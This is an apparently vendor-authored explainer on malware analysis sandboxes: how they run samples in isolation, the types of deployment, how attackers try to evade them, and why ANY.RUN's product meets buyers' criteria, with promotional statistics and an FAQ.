In short, a malware analysis sandbox turns hidden threats into visible data, giving cybersecurity teams the clarity they need to understand, detect, and stop complex attacks before they spread.
Experience real-time malware analysis in action with ANY.RUN’s Interactive Sandbox
A malware sandbox operates by executing suspicious files, links, or processes in a virtual and fully isolated environment that imitates a real operating system. This lets analysts safely observe every action the sample performs, without exposing actual devices or networks to risk.
Modern sandboxes can be built on virtual machines, containers, or emulation frameworks. Each architecture recreates realistic conditions, including file systems, system registries, network connections, and even user interactions, so malware behaves as it would in the wild.
Here’s how sandbox analysis typically unfolds:
Submission: A suspicious file or URL is uploaded to the sandbox environment for testing.
Execution: The sample runs in isolation, often within multiple OS profiles or hardware simulations.
Observation: The sandbox records every change; file creation, registry edits, system calls, and outbound connections.
Reporting: Once execution completes, a detailed report summarizes the malware’s actions, persistence attempts, and communication patterns.
This approach, known as dynamic malware analysis, focuses on behavior instead of static code. It allows analysts to detect zero-day threats, hidden payloads, and polymorphic variants that traditional antivirus tools often miss.
Advanced malware detection sandboxes also counter evasion tactics by simulating real user activity, extending runtime to catch delayed triggers, and randomizing system identifiers to appear like genuine machines.
By sandboxing malware, security teams gain deep behavioral visibility, understanding not just what the file is, but what it tries to do.
Example: See Real Sandbox Analysis in Action
To see how this process works in practice, let’s look at a real-world example. Inside the ANY.RUN sandbox, a phishing sample pretending to be a Google Careers page was analyzed.
The sandbox reveals the entire attack chain in just 60 seconds, from the Salesforce redirect and Cloudflare CAPTCHA to the fake login page that stole credentials and sent them to its command server.
Phishing exposed inside ANY.RUN malware sandbox in 60 seconds
All stages were captured in real time: every request, redirection, and data theft attempt. The sandbox also generated a full picture of the attack: key indicators like file hashes and domains, the techniques the malware used, its network activity, and a clear process timeline. Everything an analyst would need to investigate or build detection rules was right there in one report.
Benefits of a Malware Sandbox
A malware sandbox gives analysts a clear view of what really happens when a threat runs. Instead of guessing based on static scans or file signatures, teams can watch the malware in action; safely, and in real time.
Here’s why that matters:
Detect new threats early: Behavior-based detection helps catch zero-day malware before traditional tools even recognize it.
See the full attack chain: From file creation to network communication, sandboxes reveal every step the malware takes.
Cut down false alarms: Real behavior data separates real threats from harmless lookalikes, reducing alert fatigue.
Save investigation time: Automated sandbox analysis delivers full behavioral reports in minutes, not hours.
Strengthen threat intelligence: Indicators like domains, hashes, and payloads collected from sandbox runs can feed directly into your detection systems.
Scale with ease: Cloud sandbox setups let teams analyze thousands of samples at once, keeping pace with large-scale attacks.
In short, a malware sandbox helps teams move from guessing to knowing, turning hidden behavior into clear, actionable insights that speed up detection and response.
Types of Malware Sandboxes
Not all sandboxes work the same way. Depending on how they’re deployed and what they’re used for, organizations can choose between several types, each offering a different balance of control, scalability, and performance.
1. On-Premise Sandboxes
These sandboxes run inside an organization’s own infrastructure. They’re ideal for teams that handle sensitive data and need full control over their analysis environment. On-premise setups can be customized to mimic internal systems closely, from OS configurations to network settings, but they often require more maintenance and hardware resources.
2. Cloud Sandboxes
A cloud sandbox runs remotely, making it easier to scale and share results across distributed teams. It’s especially useful for SOCs that need to analyze large volumes of samples daily or for companies that want access without complex local setup. Cloud solutions also stay up to date automatically, ensuring faster adaptation to new threats.
3. Open-Source Sandboxes
These types of sandboxes allow researchers and security teams to build their own sandbox environments from scratch. They’re highly customizable and great for experimentation or research, though they usually require more technical know-how to maintain.
Each of these types of malware sandboxes serves a different need; from enterprise-grade automation to hands-on analysis. Choosing the right one depends on how much control, customization, and scale your security operations require.
Feature
On-Premise
Cloud
Open-Source
Easy setup & deployment
Manual
Automatic updates
Scalable for multiple analyses
Limited
Limited
Customizable environment
Partial
Real-time collaboration
No maintenance required
Integration with other tools (SIEM, SOAR, etc.)
Possible
Manual
Cost efficiency
Medium
(Free)
Data privacy & local control
Depends on provider
Ideal for large SOCs & MSSPs
Sometimes
— Yes — Partial / depends on setup — No
Who Needs a Malware Sandbox and How They Use It
A malware sandbox is a daily necessity across different areas of cybersecurity. From SOC teams to threat intelligence analysts, everyone benefits from being able to see how malware behaves in a safe environment.
Sandboxing is used universally across SOC teams
Here’s how different professionals rely on sandbox analysis:
SOC teams: Use sandboxes to validate alerts and speed up triage. Instead of guessing whether a file is dangerous, they can watch its behavior in real time and prioritize responses accordingly.
Incident responders: Reconstruct full attack chains after an intrusion. Sandbox reports reveal what files were dropped, which connections were made, and how the infection spread; key data for containment.
Threat intelligence analysts: Extract indicators of compromise (IOCs), domains, and behavioral patterns to feed detection rules and threat databases.
Researchers and malware analysts: Study new malware families in depth without risking production systems, documenting how they evolve or communicate with C2 servers.
Managed security providers (MSSPs): Integrate sandbox results into client reports or monitoring workflows, adding measurable value to their detection and response services.
Sandbox vs Antivirus: Why Sandboxing Wins Against Unknown Threats
Antivirus software protects against threats that are already known. It scans files, compares them to a database of malware signatures, and blocks anything that matches. This method works well for common, well-documented attacks, but it struggles with new or changing ones.
Modern malware often hides its code, changes its structure, or uses encryption to stay invisible to signature-based tools. That’s where a malware sandbox makes all the difference.
Instead of checking what a file looks like, a sandbox watches what it does. It runs the file in a safe, isolated environment and tracks every move; the processes it starts, the files it creates, and the connections it tries to make. This approach, called behavior-based detection, exposes even the newest or most complex threats.
Simply put, antivirus tools stop what’s already known. A malware sandbox uncovers what’s new and unknown.
Used together, they give teams both quick protection and deeper visibility; a strong mix for modern cyber defense.
How Attackers Try to Evade Sandboxes and Why They Still Get Caught
As malware sandboxes become more advanced, attackers are learning to adapt. Some modern malware doesn’t simply run its code right away; it first checks where it’s running. If it senses it’s inside a sandbox, it may stay quiet, hoping to slip through undetected.
These are some of the most common tricks attackers use:
Delaying execution: The malware waits several minutes or hours before acting, trying to outlast the sandbox’s observation time.
Looking for virtual clues: It searches for signs that it’s inside a virtual machine, like specific file names, processes, or limited memory, and stops running if it finds them.
Waiting for human activity: Some samples won’t execute until they detect mouse movement or clicks, assuming automated systems won’t simulate them.
Checking network connections: Malware might reach out to its command-and-control server and only activate if it receives a valid response.
ANY.RUN’s sandbox revealing the malicious link hidden inside the QR code most traditional detections tools would miss
To keep up, modern malware analysis sandboxes have grown much smarter. They simulate human actions like typing and clicking, randomize virtual hardware details, and even extend analysis time to catch delayed behavior. Some advanced platforms also run the same sample across multiple environments to expose hidden logic or secondary payloads.
So yes, attackers keep trying to fool sandboxes. But as sandbox technology evolves, those tricks are becoming less effective. Each new generation of sandbox security makes it harder for malware to hide, ensuring analysts still see the full picture before damage is done.
How to Choose the Right Malware Sandbox
With so many sandbox solutions available, choosing the right one can be tricky. Some focus on quick verdicts, others on deep behavioral insights. The best choice depends on your goals; whether you’re running a SOC, enriching threat intelligence, or conducting malware research.
When evaluating options, start with what matters most: visibility. A good sandbox doesn’t just tell you that a file is malicious, it shows why. It should capture every action the sample performs: file system changes, registry edits, process trees, and network traffic. These behavioral details are what make sandbox analysis so powerful.
Realism is equally important. The closer the sandbox mimics a real system, the more accurate the results. Platforms that support multiple operating systems and simulate user activity (like mouse clicks or typing) are better at exposing evasive malware that would otherwise stay hidden.
Speed, scalability, and integration also matter. Cloud-based sandboxes process hundreds of samples in parallel, deliver reports within minutes, and connect easily to SIEM, SOAR, or threat intelligence systems. Structured exports in formats like JSON or STIX/TAXII make automation effortless.
Finally, consider privacy. If you work with sensitive or client data, make sure your sandbox offers private or isolated analysis modes.
Options for running private analysis with ANY.RUN’s sandbox
When choosing your sandbox, think beyond detection. Look for visibility, speed, flexibility, and control; the qualities that help you understand how malware behaves and stop it before it spreads.
Why ANY.RUN Meets These Criteria
If you take those same criteria and apply them to ANY.RUN, you’ll see how closely the platform aligns with what modern security teams need.
Factor
How ANY.RUN Delivers It
Behavioral visibility
Displays every system and network action in real time, with visualized process trees and detailed logs.
Realistic environment
Simulates genuine user behavior, forcing evasive malware to reveal its payloads.
Multiple OS environments
Supports Windows, Linux, Android analysis, with new profiles added regularly.
Interactivity
Analysts can click, type, and interact with running samples — exposing behavior that static tools miss.
Speed and scalability
Cloud infrastructure processes multiple samples in parallel, generating full reports in minutes.
Automation and integrations
Connects with SIEM, SOAR, and TI tools via API or webhook for seamless workflow automation.
Threat intelligence enrichment
Extracts IOCs, maps MITRE ATT&CK techniques, and links to related CVEs automatically.
Clear, exportable reports
Offers human-readable summaries and structured outputs (JSON, STIX/TAXII).
Privacy options
Private analysis mode ensures sensitive data stays isolated and secure.
Ease of use
Intuitive interface and quick setup make analysis accessible to any skill level.
Anti-evasion features
Randomized environments, user simulation, and adjustable runtime defeat stealthy malware tactics.
Managed lookups & history
Analysts can search past public or private sessions and track recurring threats.
ANY.RUN combines what most teams need from a sandbox: visibility, control, and speed; all in a secure, interactive cloud environment. It helps analysts move faster, collaborate better, and uncover behaviors that traditional tools simply can’t see.
Teams Using ANY.RUN’s Interactive Sandbox Report Measurable Results:
95% of SOCs speed up investigations through real-time interaction and live analysis.
Up to 3× higher SOC efficiency, with faster decision-making and automated data sharing.
21-minute reduction in mean time to respond (MTTR) per incident.
36% higher detection rate on average, uncovering hidden and multi-stage threats earlier.
Up to 58% more threats detected overall, with behavioral visibility that static tools can’t match.
20% lower workload for Tier 1 analysts, as sandbox automation removes repetitive triage steps.
90% of threats visible within 60 seconds, allowing faster containment and less dwell time.
For businesses, that means lower risk exposure, more productive analysts, and faster containment of incidents, all without expanding headcount or infrastructure.
Discover how ANY.RUN can help your team detect faster, analyze deeper, and respond smarter
Frequently Asked Questions About Malware Sandboxes
1. Do I need a malware sandbox if I already use antivirus software?
Yes. Antivirus tools catch known threats using signatures, while a sandbox helps detect unknown or evolving malware by observing real behavior. Together, they form a stronger defense.
2. Can malware escape a sandbox?
It’s extremely rare with modern platforms. Reputable sandboxes, especially cloud-based ones, use strict isolation layers to ensure any malicious code stays fully contained.
3. How long does sandbox analysis take?
Most analyses complete in a few minutes. Cloud sandboxes are faster because they can run multiple sessions at once and generate reports almost instantly. For instance, 90% of sandbox analysis carried out inside ANY.RUN sandbox last around 60 seconds.
4. What’s the difference between static and dynamic malware analysis?
Static analysis examines code without executing it. Dynamic analysis, what a sandbox performs, actually runs the file to observe its real behavior and system impact.
5. How can I tell if a sandbox is effective?
Look for detailed behavioral reports, IOCs extraction, and options for interactivity or automation. If it helps you understand why a file is malicious, not just that it is, it’s doing its job well.
6. Is cloud-based sandboxing secure for sensitive samples?
Yes, when privacy features are enabled. Some solutions, like the ANY.RUN sandbox, let users run fully private sessions where samples and results stay completely isolated.
7. What types of threats benefit most from sandbox analysis?
Dynamic environments are especially useful for ransomware, downloaders, stealers, and phishing payloads; malware that changes behavior based on context or timing.
8. Can a sandbox integrate with my existing tools?
Many modern sandboxes like ANY.RUN’s Interactive Sandbox support API connections, STIX/TAXII feeds, and SIEM/SOAR integrations. This allows automatic data sharing and faster incident response.
About ANY.RUN
ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, makes this kind of investigation fast and accessible. The service processes millions of analysis sessions and is trusted by 15,000+ organizations and over 500,000 professionals worldwide.
Teams using ANY.RUN report measurable results; up to 3× higher SOC efficiency, 90% faster detection of unknown threats, and a 60% drop in false positives thanks to real-time interaction and behavior-based analysis.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-10-30 13:06:422025-10-30 13:06:42What is a Malware Sandbox? Everything SOC Analysts and CISOs Need to Know
Manual 
